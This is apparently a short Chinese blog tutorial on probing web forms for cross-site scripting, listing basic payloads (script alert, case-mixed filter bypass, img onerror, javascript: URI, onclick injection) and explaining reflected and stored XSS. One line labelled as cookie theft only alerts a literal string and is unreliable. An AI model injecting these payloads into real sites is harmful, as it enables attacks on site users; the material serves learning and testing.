探测XSS漏洞方法

一. 登陆页面

二. 在输入框直接输入对应脚本攻击(通用)

  1. 简单弹框:

<script>alert('XSS')</script>

  1. 过滤了大小:

<ScRiPt>AlErt('XSS')</ScRiPt>

  1. 对 img 标签 进行绕过

<img src="#" onerror=alert("XSS")>

  1. 使用 Javascript 的尾协议的脚本

javascript:alert('xss')

  1. 利用 href 属性值来进行xss

' onclick=' alert("xss")

三. 反射型XSS攻击

1)反射型(xss)

反射型(xss):XSS代码常常出现在URL请求中,当用户访问带有XSS代码的URL请求时,服务器端接收请求并处理,然后将带有XSS代码的数据返回给浏览器,浏览器解析该段带有XSS代码的数据并执行,整个过程就像一次反射,故称为反射型XSS.

(1)<script>alert('反射型(xss)')</script> //简单弹框

(2)<ScRiPt>AlErt('反射型(xss)')</ScRiPt> //过滤了大小

(3)<script>alert('document.cookie')</script> //窃取用户 Cookie

四. 存储型XSS攻击

2)存储型(xss)

存储型(xss):攻击的特点是提交的恶意内容会被永久存储,因而一个单独的恶意代码就会使多个用户受害,故被称为持久性XSS.-----一般场景在留言板输入框等

相关推荐
Flynt3 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab8 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31111 天前
VPN 与内网穿透
安全
Mr_愚人派12 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao13 天前
【无标题】
人工智能·安全
Alsn8613 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院13 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
treesforest13 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安13 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
开发小能手-roy13 天前
StringBuilder vs StringBuffer:2024年还需要线程安全字符串吗?
开发语言·python·安全